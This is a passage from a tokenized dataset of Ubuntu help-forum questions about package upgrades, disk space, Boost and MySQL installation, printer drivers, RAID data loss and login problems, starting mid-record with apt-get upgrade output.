libdns69 libdpkg-perl libdvdread4 libexif-dev libexif12 libfreetype6 libfreetype6-dev libgcr0 libgksu2-0 libgl1-mesa-dev libgl1-mesa-dri libgl1-mesa-glx libglu1-mesa libglu1-mesa-dev libgnutls26 libgp11-0 libgssapi-krb5-2 libgssrpc4 libgvfscommon0 libgweather-common libgweather1 libimobiledevice2 libisc62 libisccc60 libisccfg62 libk5crypto3 libkadm5clnt-mit7 libkadm5srv-mit7 libkdb5-4 libkrb5-3 libkrb5-dev libkrb5support0 liblwres60 libmagickcore3 libmagickcore3-extra libmagickwand3 libmono-accessibility1.0-cil libmono-accessibility2.0-cil libmono-bytefx0.7.6.1-cil libmono-bytefx0.7.6.2-cil libmono-c5-1.1-cil libmono-cairo1.0-cil libmono-cairo2.0-cil libmono-cecil-private-cil libmono-cil-dev libmono-corlib1.0-cil libmono-corlib2.0-cil libmono-cscompmgd7.0-cil libmono-cscompmgd8.0-cil libmono-data-tds1.0-cil libmono-data-tds2.0-cil libmono-data1.0-cil libmono-data2.0-cil libmono-db2-1.0-cil libmono-debugger-soft0.0-cil libmono-dev libmono-getoptions1.0-cil libmono-getoptions2.0-cil libmono-i18n-west1.0-cil libmono-i18n-west2.0-cil libmono-i18n1.0-cil libmono-i18n2.0-cil libmono-ldap1.0-cil libmono-ldap2.0-cil libmono-management2.0-cil libmono-messaging-rabbitmq2.0-cil libmono-messaging2.0-cil libmono-microsoft-build2.0-cil libmono-microsoft7.0-cil libmono-microsoft8.0-cil libmono-npgsql1.0-cil libmono-npgsql2.0-cil libmono-oracle1.0-cil libmono-oracle2.0-cil libmono-peapi1.0-cil libmono-peapi2.0-cil libmono-posix1.0-cil libmono-posix2.0-cil libmono-rabbitmq2.0-cil libmono-relaxng1.0-cil libmono-relaxng2.0-cil libmono-security1.0-cil libmono-security2.0-cil libmono-sharpzip0.6-cil libmono-sharpzip0.84-cil libmono-sharpzip2.6-cil libmono-sharpzip2.84-cil libmono-simd2.0-cil libmono-sqlite1.0-cil libmono-sqlite2.0-cil libmono-system-data-linq2.0-cil libmono-system-data1.0-cil libmono-system-data2.0-cil libmono-system-ldap1.0-cil libmono-system-ldap2.0-cil libmono-system-messaging1.0-cil libmono-system-messaging2.0-cil libmono-system-runtime1.0-cil libmono-system-runtime2.0-cil libmono-system-web-mvc1.0-cil libmono-system-web-mvc2.0-cil libmono-system-web1.0-cil libmono-system-web2.0-cil libmono-system1.0-cil libmono-system2.0-cil libmono-tasklets2.0-cil libmono-wcf3.0-cil libmono-webbrowser0.5-cil libmono-windowsbase3.0-cil libmono-winforms1.0-cil libmono-winforms2.0-cil libmono0 libmono1.0-cil libmono2.0-cil libmysqlclient-dev libmysqlclient16 libnm-glib-vpn1 libnm-glib2 libnm-util1 libpam-gnome-keyring libpng12-0 libpng12-dev libpostproc51 libpq-dev libpq5 libpurple-bin libpurple0 libqt4-core libqt4-dbus libqt4-declarative libqt4-designer libqt4-dev libqt4-help libqt4-network libqt4-opengl libqt4-opengl-dev libqt4-qt3support libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-mysql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libraptor1 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-gb libreoffice-help-en-us libreoffice-help-zh-tw libreoffice-impress libreoffice-l10n-common libreoffice-l10n-en-gb libreoffice-l10n-en-za libreoffice-l10n-zh-tw libreoffice-math libreoffice-style-human libreoffice-writer libruby1.8 libservlet2.5-java libsmbclient libsnmp-base libsnmp15 libssl-dev libssl0.9.8 libswscale-dev libswscale0 libsyncdaemon-1.0-1 libtasn1-3 libtiff4 libtiff4-dev libtiffxx0c2 libwbclient0 libwxbase2.8-0 libwxbase2.8-dev libwxgtk2.8-0 libwxgtk2.8-dev libxml2 libxml2-dev libxml2-utils light-themes linux-firmware linux-headers-2.6.38-13 linux-headers-2.6.38-13-generic linux-image-2.6.38-13-generic linux-libc-dev mesa-common-dev mobile-broadband-provider-info mono-2.0-devel mono-2.0-gac mono-csharp-shell mono-devel mono-gac mono-gmcs mono-runtime monodoc-base monodoc-manual multiarch-support mysql-common network-manager network-manager-gnome nvidia-common nvidia-current openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openni-dev openrave openrave-minimal openrave-python-minimal openrave0.6-dp openrave0.6-dp-data openrave0.6-dp-dev openrave0.6-dp-ikfast openrave0.6-dp-matlab openrave0.6-dp-octave openrave0.6-dp-plugin-logging openrave0.6-dp-plugins-all openssl plasma-scriptengine-declarative plasma-scriptengine-javascript ps-engine python-apport python-aptdaemon python-aptdaemon-gtk python-aptdaemon.gtk3widgets python-aptdaemon.gtkwidgets python-crypto python-httplib2 python-launchpadlib python-libxml2 python-pam python-papyon python-problem-report python-tz python-ubuntuone-client python-ubuntuone-storageprotocol python-uno python-wxgtk2.8 python-wxversion qt4-designer qt4-dev-tools qt4-doc qt4-qmake ruby1.8 ruby1.8-dev samba-common samba-common-bin smbclient software-center sudo sysv-rc sysvinit-utils tomboy ttf-opensymbol tzdata tzdata-java ubuntu-sso-client ubuntuone-client ubuntuone-client-gnome udisks unity unity-common uno-libs3 update-manager update-manager-core ure whois wx2.8-headers xserver-xorg-video-intel xul-ext-ubufox 346 upgraded , 0 newly installed , 0 to remove and 242 not upgraded . need to get 514 mb of archives . after this operation , 15.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? as it said 'after this operation , 15.8 mb of additional disk space will be used . ' , so i try to df before upgrade : sam @ sam : ~/code/ros/pcl $ df -m filesystem 1m-blocks used available use % mounted on /dev/sda6 46934 22391 22160 51 % / none 1973 1 1973 1 % /dev none 1981 15 1967 1 % /dev/shm none 1981 1 1981 1 % /var/run none 1981 0 1981 0 % /var/lock /dev/sdb1 469453 79594 366013 18 % /media/externel_500g sam @ sam : ~/code/ros/pcl $ and after i upgrade : sam @ sam : ~/code/ros/pcl $ df -m filesystem 1m-blocks used available use % mounted on /dev/sda6 46934 23114 21437 52 % / none 1973 1 1973 1 % /dev none 1981 15 1967 1 % /dev/shm none 1981 1 1981 1 % /var/run none 1981 0 1981 0 % /var/lock /dev/sdb1 469453 79594 366013 18 % /media/externel_500g sam @ sam : ~/code/ros/pcl $ the number 21437-22160 is about 700mb , but apt-get says it needs 15.8 mb . how to fix it ? or is it possible to clean all the archives it downloads ? is this way can save disk space ? thank you~ i followed @ izx answer . now i run : sam @ sam : ~/code/ros/pcl $ sudo apt-get clean [ sudo ] password for sam : sam @ sam : ~/code/ros/pcl $ df -m 檔案系統 1m-區段 已用 可用 已用 % 掛載點 /dev/sda6 46934 22558 21993 51 % / none 1973 1 1973 1 % /dev none 1981 15 1967 1 % /dev/shm none 1981 1 1981 1 % /var/run none 1981 0 1981 0 % /var/lock /dev/sdb1 469453 79594 366013 18 % /media/externel_500g sam @ sam : ~/code/ros/pcl $ now is back to about 22g . the disk space : 22.16g - 22g - 15.8mb = 0.16g - 15.8mb = 160mb - 15.8mb = 144.2mb where is the missing 144.2mb ? thank you~
174093	do all updates , even kernel , take affect without rebooting	i use 11.04 . when i upgrade a package , it shows a message similar to this : unpacking replacement libkrb5support0 ... preparing to replace libgssrpc4 1.8.3+dfsg-5ubuntu2.2 ( using ... /libgssrpc4_1.8.3+dfsg-5ubuntu2.3_amd64.deb ) ... a kernel message : examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.38-13-generic /boot/vmlinuz-2.6.38-13-generic * dkms : running auto installation service for kernel 2.6.38-13-generic -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * vboxhost ( 4.1.18 ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.38-13-generic /boot/vmlinuz-2.6.38-13-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.38-13-generic /boot/vmlinuz-2.6.38-13-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.38-13-generic /boot/vmlinuz-2.6.38-13-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.38-13-generic /boot/vmlinuz-2.6.38-13-generic do all packages , even kernel upgrades , take place without a need to reboot now ? if yes , how they do it ? is this true in all versions of ubuntu ? thank you~
174094	can not upgrade from lts 10.04 to anything	i have followed the instructions to set my update manager to check for release upgrades , i.e in software sources - > updates - > release upgrade it is set to `` normal releases '' . i am happy to go from 10.04 to 11.x then to 12.04 as recommended , but it simply will not find any upgrades available . i have also tried running sudo do-release-upgrade -d it says checking for new ubuntu release no new release found
174095	how to upgrade boost lib using apt-get ?	i use ubuntu 11.04 . my boost version : sam @ sam : ~/code/ros/pcl $ apt-cache showpkg libboost-all-dev package : libboost-all-dev versions : 1.42.0.1ubuntu1 ( /var/lib/apt/lists/tw.archive.ubuntu.com_ubuntu_dists_natty_universe_binary-amd64_packages ) ( /var/lib/dpkg/status ) description language : file : /var/lib/apt/lists/tw.archive.ubuntu.com_ubuntu_dists_natty_universe_binary-amd64_packages md5 : 72efad05a3c79394c125b79e1d4eb3a7 reverse depends : libvtk5-dev , libboost-all-dev libfeel++-dev , libboost-all-dev dependencies : 1.42.0.1ubuntu1 - libboost-dev ( 0 ( null ) ) libboost-date-time-dev ( 0 ( null ) ) libboost-filesystem-dev ( 0 ( null ) ) libboost-graph-dev ( 0 ( null ) ) libboost-iostreams-dev ( 0 ( null ) ) libboost-math-dev ( 0 ( null ) ) libboost-program-options-dev ( 0 ( null ) ) libboost-python-dev ( 0 ( null ) ) libboost-regex-dev ( 0 ( null ) ) libboost-serialization-dev ( 0 ( null ) ) libboost-signals-dev ( 0 ( null ) ) libboost-system-dev ( 0 ( null ) ) libboost-test-dev ( 0 ( null ) ) libboost-thread-dev ( 0 ( null ) ) libboost-wave-dev ( 0 ( null ) ) provides : 1.42.0.1ubuntu1 - reverse provides : sam @ sam : ~/code/ros/pcl $ how to upgrade boost to 1.44+ by using apt tools ? thank you~ when i run apt-add-repository , it shows : sam @ sam : ~/code/ros/pcl $ sudo apt-add-repository ppa : timklingt/ppa error reading https : //launchpad.net/api/1.0/~timklingt/+archive/ppa : gnutls recv error ( -9 ) : a tls packet with unexpected length was received . sam @ sam : ~/code/ros/pcl $ how to fix it ? thank you~ i try to install libboost1.46-all-dev : sam @ sam : ~/code/ros/pcl $ sudo apt-get install libboost1.46-all-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost1.46-all-dev : depends : libboost1.46-dev but it is not going to be installed depends : libboost-date-time1.46-dev but it is not going to be installed depends : libboost-filesystem1.46-dev but it is not going to be installed depends : libboost-graph1.46-dev but it is not going to be installed depends : libboost-iostreams1.46-dev but it is not going to be installed depends : libboost-math1.46-dev but it is not going to be installed depends : libboost-program-options1.46-dev but it is not going to be installed depends : libboost-python1.46-dev but it is not going to be installed depends : libboost-regex1.46-dev but it is not going to be installed depends : libboost-serialization1.46-dev but it is not going to be installed depends : libboost-signals1.46-dev but it is not going to be installed depends : libboost-system1.46-dev but it is not going to be installed depends : libboost-test1.46-dev but it is not going to be installed depends : libboost-thread1.46-dev but it is not going to be installed depends : libboost-wave1.46-dev but it is not going to be installed e : broken packages sam @ sam : ~/code/ros/pcl $ what 's these error means ? and how to solve it ? thank you~
174098	i do n't know how to configure usb modem for huawei 3g mobile network of cat cdma	please help me someone who know how to configure it : cat cdma , huawei c880/evdo 3g network : usb modem i do n't know how to configure to connect it . please help me if someone who know about it .
174108	getting the prompt for next command in terminal	whenever i type the name of an application to open it , the application opens , but after opening it , the terminal seems to be busy with a process so that it does n't give me the prompt for the next command ( i mean following the $ sign ) . then i ca n't type any more command in the terminal and i have to exit it pressing the close button ( at the top left ) which in turn kills the process . please note that i am using precise pangolin & this problem seems to be pertaining to all the processes .
174115	why and where to create a loopback file for live persistence session ?	i currently help qa team in iso testing , but i stumbled on a test-case that required some extra research . i just learned about persistence from this wiki page . ctrl+f to `` using a loop-back file . '' since i will be iso testing on a mac , i do n't know if it 's appropriate to make the file in the root of the partition of my ubuntu computer . if the loop-back file is indeed necessary , how can i use it for my mac computer ? if it is as simple as copy-paste , i 'll be surprised . thanks .
174116	i can not play movie dvd 's	i 'm running ubuntu 12.04 , i put a music cd in the dvd player and it plays it . i put a dvd to watch a movie and nothing happens . i have vlc and movie player installed . it 's like ubuntu does not see the dvd player . can i get help please .
174124	how to disable plug in power source sound while headphone is plugged in ?	i want to disable the `` power source plugged/unplugged notification sound '' when i have my headphones plugged in . how canister do that ?
174128	why ca n't my installer load the `` libglib-2.0.so.0 '' shared library ?	i have to install an agent software for my college intranet . they provide this .bin file as the installer file . i type ./file.bin after going to the right directory . it says error while loading shared libraries : libglib-2.0.so.0 : can not open shared object file : no such file or directory what is the problem ? i have already done sudo chmod +x file.bin edit : /lib/x86_64-linux-gnu/libglib-2.0.so.0 /lib/x86_64-linux-gnu/libglib-2.0.so.0.3200.3 /usr/share/gdb/gdb/auto-load/libglib-2.0.so.0.3200.3-gdb.py output of sudo updatedb & & locate libglib-2.0.so.0
174133	gnome shell theme disabled	can someone help me resolve this issue . i am new to ubuntu . let me know what additional information you need . xemex @ ubuntu : ~ $ sudo apt-get install gnome-shell-extensions-user-theme reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages .
174137	should i be concerned about comreset errors with my ssd ?	i have recently installed ubuntu 12.04 32 bit on a lenovo x220 , that is certified to work correctly with the os ( see here ) including its default 128gb ssd by samsung . as soon as i got the laptop i have immediately upgraded to a crucual m4-ct512m4ssd1 ( 7mm 512gb ) ssd that apparently works nicely but for what is described below . i hope you can give advice . first of all , context : giacecco @ giaceccos-x220 : ~/temp $ sudo hdparm -i /dev/sda | grep -e model -e firmware [ sudo ] password for giacecco : model number : m4-ct512m4ssd1 firmware revision : 000f giacecco @ giaceccos-x220 : ~/temp $ uname -a linux giaceccos-x220 3.2.0-27-generic-pae # 43-ubuntu smp fri jul 6 15:06:05 utc 2012 i686 i686 i386 gnu/linux ahci is enabled in the bios . the laptop has a sata 3 controller . the full disk is used for ubuntu , and fully encrypted with lvm . then , basic performance indicators : see palimpsest 's output here , hdparm below : giacecco @ giaceccos-x220 : ~/temp $ sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 9664 mb in 2.00 seconds = 4834.41 mb/sec timing buffered disk reads : 1402 mb in 3.00 seconds = 466.81 mb/sec assuming hard disk encryption is not relevant , the ssd appears to be slow in respect to the 128gb equivalent on cached reads but faster on timing buffered reads ( according to some benchmarks on wiki.archlinux.org ) . i do not have sufficient understanding of ssd architecture to understand if this can be considered normal or not . finally , the actual issue . whenever i suspend the laptop and i wake it back up i find this sequence in syslog : ( ... ) jul 24 07:34:14 giaceccos-x220 kernel : [ 20878.861152 ] ata1 : link is slow to respond , please be patient ( ready=0 ) jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.505379 ] ata1 : comreset failed ( errno=-16 ) jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.825130 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.825701 ] ata1.00 : acpi cmd ef/02:00:00:00:00 : a0 ( set features ) succeeded jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.825704 ] ata1.00 : acpi cmd f5/00:00:00:00:00 : a0 ( security freeze lock ) filtered out jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.825706 ] ata1.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.826809 ] ata1.00 : acpi cmd ef/02:00:00:00:00 : a0 ( set features ) succeeded jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.826825 ] ata1.00 : acpi cmd f5/00:00:00:00:00 : a0 ( security freeze lock ) filtered out jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.826827 ] ata1.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.827353 ] ata1.00 : configured for udma/100 jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.841416 ] pm : resume of drv : sd dev:0:0:0:0 complete after 10366.217 msecs jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.841455 ] pm : resume of drv : scsi_disk dev:0:0:0:0 complete after 10331.031 msecs jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.841459 ] pm : resume of drv : scsi_device dev:0:0:0:0 complete after 10366.255 msecs jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.842748 ] hdaps : initial mode latch is 0x05 jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.842883 ] hdaps : setting ec_rate=250 , filter_order=2 jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.843124 ] pm : resume of devices complete after 10368.491 msecs jul 24 07:34:14 giaceccos-x220 kernel : [ 20883.843365 ] pm : resume devices took 10.368 seconds ( ... ) of the lines above , the comreset one is loudly displayed on screen before i am offered to unlock the system . the ssd appears to work normally anyway , ubuntu appears responsive , but seeing the comreset lines on screen makes me wonder if i am doing anything wrong , or - worse - anything could break sooner or later , particularly if ubuntu updated any drivers and that would not take it easy about the error . what do you reckon ? thanks ! giacecco
174138	how to install mysql ?	i tried mysql in my command line : i get : the program 'mysql ' is currently not installed . you can install it by typing : sudo apt-get install mysql-client-core-5.5 but when i do : sudo apt-get install mysql-client-core-5.5 but i get : reading package lists ... done building dependency tree reading state information ... done mysql-client-core-5.5 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 47 not upgraded . i 'm very much confused ! thanks in advance .
174142	can google desktop be used with 12.04 ?	i would like to use google desktop with ubuntu 12.04 . i have seen ( old ) notices of google desktop being discontinued ; can this be so ?
174143	convert xml to csv shell command line	i have a large xml file ( 600mb ) and i want to convert that into csv through terminal commands . i have tried to convert the xml into txt through xml2 command using the following syntax . xml2 < big.xml > big.txt my xml fromat is < reportdetails > < date > 08/08/2012 < /date > < caseno > 13030903 < /caseno > < userdetailstext > individual details < /userdetailstext > < userdetails > < userid > 0903 < /userid > < firstname > john < /firstname > < surname > perry < /surname > < occupation > developer < /occupation > < dateofbirth > 02/14/1981 < /dateofbirth > < /userdetails > < applicationdetailstext > conflict resolution details < /applicationdetailstext > < applicationdetails > < applicationno > 13033 < /applicationno > < applicationname > john perry < /applicationname > < department > information technology < /department > < applicationtype > personal < /applicationtype > < applicationdate > 06/07/2012 < /applicationdate > < applicationenddate > 09/07/2012 < /applicationenddate > < applicationstatus > closed < /applicationstatus > < /applicationdetails > < /reportdetails > i want these fields in csv file separated with a pipe ( | ) date | caseno | firstname | surname | applicationno | applicationname | applicationdate | applicationstatus also if i want to do the file through a php file will i need a shell script to perform that .
174144	what are the minimum system requirements for 12.04 lts on a 2gb environment	i have 2gb ram and an intel core duo ( 3.73ghz ) , it 's a toshiba satellite l310 . it does n't work well in ubuntu 11.04 . if i install the ubuntu 12.04 lts , will it be lag again ?
174151	can not use pip or easy_install because deleted /etc/lib/python2.7/urllib.py	like said on title , by a slip of the keys i issued the command : sudo rm /etc/lib/python2.7/urllib.py sudo rm /etc/lib/python2.7/urllib2.py and with that the problems started , ubuntu still starts , but when i now want to do anything with pip or easy_install , i get this error : ... .. import sys , os.path , re , urlparse , urllib , urllib2 , shutil , random , socket , cst $ importerror : no module named urllib how can i recover it ? update : i reinstall python2.7 based on the answer of sagarchalise but when i search with pip comand then now i get following issue : exception : traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/dist-packages/pip-1.1-py2.7.egg/pip/basecommand.py '' , line 104 , in main status = self.run ( options , args ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.1-py2.7.egg/pip/commands/search.py '' , line 34 , in run pypi_hits = self.search ( query , index_url ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.1-py2.7.egg/pip/commands/search.py '' , line 48 , in search hits = pypi.search ( { 'name ' : query , 'summary ' : query } , 'or ' ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1224 , in __call__ return self.__send ( self.__name , args ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1578 , in __request verbose=self.__verbose file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1264 , in request return self.single_request ( host , handler , request_body , verbose ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1292 , in single_request self.send_content ( h , request_body ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1439 , in send_content connection.endheaders ( request_body ) typeerror : endheaders ( ) takes exactly 1 argument ( 2 given ) any help here would be appriciated .
174152	highpoint rocket 2720sgl on 12.04	hi i what to build a home cinema system with 4 x 3 tb disk to store all my movies . looking at an asus p8z77-i deluxe . this only has 4 sata so i was thinking of getting a highpoint rocket raid 2720sgl controller . highpoint web site says it support `` lunix '' i have download the drivers from highpoint , but they seems to be compile your own . has anyone got these to work with 12.04 ? dose anyone have the step to make them work ? thx .
174157	vmware installation over ubuntu sever 12.04 lts	how to install vmware workstation 7.1.6-744570.i386 on ubuntu server 12.04 lts . i installed it but error is coming . vmware kernel module updater unable to build kernel module . see log file /tmp/vmware-root/setup-8887.log for details . make [ 2 ] : * [ /tmp/vmware-root/modules/vmmon-only/linux/driver.o ] error 1 make [ 1 ] : * [ module/tmp/vmware-root/modules/vmmon-only ] error 2 make [ 1 ] : leaving directory /usr/src/linux-headers-3.2.0-27-generic-pae' make : *** [ vmmon.ko ] error 2 make : leaving directory/tmp/vmware-root/modules/vmmon-only' please provide the solution for this
174158	is there a schedule for the system updates that come through update manager in 12.04 ?	i 've noticed a lot of updates come through update manager in the last few weeks . when updates to core systems are required is there a schedule for release that i can check off against what i 'm downloading onto my system ? it 's highly unlikely , but i do not want to download possibly suspect updates/programs . am i being paranoid or is this a real concern ?
174161	how do i remove a site 's desktop integration done via ubuntu webapps ?	i have recently integrated launchpad site , to my desktop using the ubuntu desktop apps feature ( i just accepted the integration ) when i loaded launchpad in firefox . i would like to remove the desktop integration , how can i do that ? i could n't find any option for the same .
174166	is it possible to override the grub timeout setting after improper boot	hi my question pertains to grub2 . i am running ubuntu on a bunch of industrial pc 's which are out of reach and hence can not be connected using keyboard / mouse . i have noticed when the os does not fully boot and i unplug the power and power on again , the grub menu loads but there is no timeout on this particular instance of the grub menu . this is perfectly reasonable as this would generally require human intervention to decide if you want to boot into the recovery etc . hoever , i would like to override this and set a timeout and boot to the os every time . any suggestions ?
174167	chromium does n't want to run java applets	i can run the java test page here in firefox , and it works fine . when i open it in chromium , it just stays white , and no `` java '' instance is started . minecraft works fine . the screen shot was taken whil openjdk-6 was installed . i have tried the following : *clearing chromium preferences data ( rm -rfv ~/.config/chromium ) *purging and re installing all java-related packages , including the icedtea plugin . *using openjdk-7 and 6 i am currently running chromium 18 ( the latest update )
174169	how can i shutdown the computer when a certain process ends ?	i often run long calculations on my computer and i would like to shut it down when this are terminated . is there some option to shutdown the computer when a specific process termanates ? thanks for the help !
174171	what are the ports used by juju for its orchestration services ?	what ports are required to be open on ubuntu cloud guests running juju client instances ? as far as i understand , zookeeper needs to communicate with all its nodes -- so that is one requirement.. anything else ? also what are the ports that are used by zookeeper ? i need these so that i can put some security rules on my ec2 instances..
174172	data hidden or lost on hdds in raid1 on ubuntu server 12.04 ?	ubuntu and data experts , please , any advice on this situation : we had a server with ubuntu 12.04 with 2 hdds in raid1 . one day system just did n't boot and after some investigation we realized that not all data are in place , in fact . there are no /home , /bin and /var folders here 's a screenshot from ubuntu desktop live cd . could someone explain how this happened : we checked hdds with fsck - nothing came up smartmontools showed around 200 sectors to remap on 1st hdd , and everything is fine on the 2nd one . we tried to restore data with testdisk - no files in /home , /bin , /var . just these folders - /home , /bin , /var which are shown red ( as deleted , i guess ) ( same on both hdds ) actually , we found a bad block on 1 hdd with testdisk ( on picture below ) , but how just one bad block can affect more than 32 gb of data ? could that be a superblock ? my question - is there any way we could restore that hidden data ? and could someone tell me how this happened , was it hardware failure or someone 's evil intent ? update : phillip thank you very much for your answer , first of all , running nautilus as root does n't give us access to any additional files . second , you 're right , we checked /dev/md1 with testdisk , not individual hdds , because testdisk did n't want to work on /dev/sda2 or /dev/sdb2 saying that this partition is a part of a raid array . third , i said that /bin , /home and /var are shown red when checking raid with testdisk , but those folders appear to be empty when i tried to get inside them ( when in testdisk ) forth , here 's output of sudo ls -ld /home /var /bin : drwxr -xr -x 2 root root 2799 apr 23 11:41 /bin drwxr -xr -x 1 root root 60 aug 9 18:56 /home drwxr -xr -x 1 root root 120 apr 23 11:38 /var but this command checks not desired disk , but our virtual disk ( we 're working under ubuntu live cd right now ) so , we modified this command to get to our desired mounted hdd like this : sudo ls -ld home var bin etc ls : can not access home : no such file or directory ls : can not access var : no such file or directory ls : can not access bin : no such file or directory drwxr -xr -x 92 root root 4096 aug 5 20:31 etc ( i added etc to the command just to check if command works , because etc is available on our hdd )
174173	why am i getting a `` failed to create pid file ... permission denied '' error ?	if a program requires write permission how should i set it with chown ? specifically , what would program foo 's permissions be to solve this error ? failed to create pid file '/var/run/bar.pid ' : permission denied
174176	how do i get an hp 1018 laser printer to work on 12.04 ?	edit : already printed on windows-machine ubuntu 12.04 , lj 1018 . i 've tried making foo2zjs from sourse . i 've downloaded firmware and placed it where necessarily manually from here i 've also tried this - same as manual dowload but with some patches like stoping cups , etc.. i 've fixed usbfs : process 11200 ( usb ) did not claim interface 0 before use problems using sudo rmmod usblp as described here . and now i have aug 10 11:51:59 pav /usr/sbin/hplj1018 : foo2zjs : usb : //hp/laserjet % 201018 ? serial=kp07rlv ... download failed . aug 10 11:51:59 pav /usr/sbin/hplj1018 : foo2zjs : loading hp laserjet 1018 firmware /lib/firmware/hp/sihp1018.dl to cups usb device ... error . before that prinet was stucking on `` sending data to printer '' . now it 's code is `` not connected '' . unless ben @ pav : ~ $ lsusb ... bus 001 device 015 : id 03f0:4117 hewlett-packard laserjet 1018 thank you .
174178	12.04 login loop	as the title says , i have problem with login . when i enter correctly password and confirm , black screen with log appears for like 0,5 seconds and then it goes back to login screen . unlike the others , i can not login even as a guest . log screen contains only few logs , last one is that battery state is [ ok ] . once i have seen something like can not find hardware rng device , but i can not see it now . when i go to console using ctrl+alt+f1 , path variables are not set , although i edited them in .bashrc and .bash_profile . is that correct ? export command solves this . yesterday , when i was working on computer , i have not done any changes to unity and graphics in general . i have been changing environment variables . do you have any ideas what could be source of this problem ?
174180	banshee gets blocked and do nothing	i installed 11.10 on an intel pentium m processor 1.40ghz , memory 733.2 mib , disk 38.6gb , ostype 32 bit . i live in mozambique were downloading software is charged by mb and is very expensive . previously i downloaded 12.04 which cost around âł10 but could n't install it since it needs pae and this pc does n't have it . so i spent another âł10 to download 11.10 . we want to do 3 very simple things with the minimum data downloading : internet connection through the dongo -done listen to music - from cd and from usb memory stick and hard disk watch a movie first it does n't recognize the cds or mp3 on my hard drive or usb . i downloaded and installed ubuntu-restricted extras , but the installation failed . i tried to install it again from the terminal writing sudo apt-get install ubuntu-restricted-extras it failed also , output below output helio @ heliopc : ~ $ sudo apt-get install ubuntu-restricted-extras reading package lists ... done building dependency tree reading state information ... done ubuntu-restricted-extras is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 440 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up flashplugin-installer ( 11.2.202.236ubuntu0.11.10.1 ) ... downloading ... -- 2012-08-10 10:18:36 -- http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.236.orig.tar.gz resolving archive.canonical.com ... failed : name or service not known . wget : unable to resolve host address `archive.canonical.com ' download failed the flash plugin is not installed . dpkg : error processing flashplugin-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after this , i can listen to one song . i click on a song on my memory stick , banshee opens up , you can hear the song but banshee is completely blocked , you can not do anything there , and when the song finish you cant close banshee it does n't respond , let alone do a play-list . why does banshee get blocked ? what do i need to do , without needing to download as i have to restart ubuntu to kill the process ? avi and dvd playback if i try to open a avi file from my memory stick , movie player opens up but it gets completely blocked and i can not close it . so i have to restart ubuntu .
174186	unable to install ubuntu	i am working on my hp laptop with windows7 . i am not able to install ubuntu ( making it dual boot ) . i have made my usb stick bootable by using unetbootin . following are the steps i took to install ubuntu : bios device options- > my_usbstick- > default . after this nothing else happens . just a blank screen persists until i have to eventually shut down my system . i assure that the iso file used is good as with the same procedure followed my friend was able to install ubuntu in his dell system . please help me out with this one .
174188	how do i install 12.04 after mounting the iso in windows ?	i would like to turn my windows 8 desktop into a server . i downloaded the ubuntu server 12.04 server iso and mounted it in windows , but i do n't get the option to install it ? how can i load up or configure some files to be able to launch the install program on windows 8 , so i can install ubuntu server 12.04 on a blank 500gb hard drive ? please note that once ubuntu server is installed , i plan to format the hard drive with windows on it so that ubuntu is the only os .
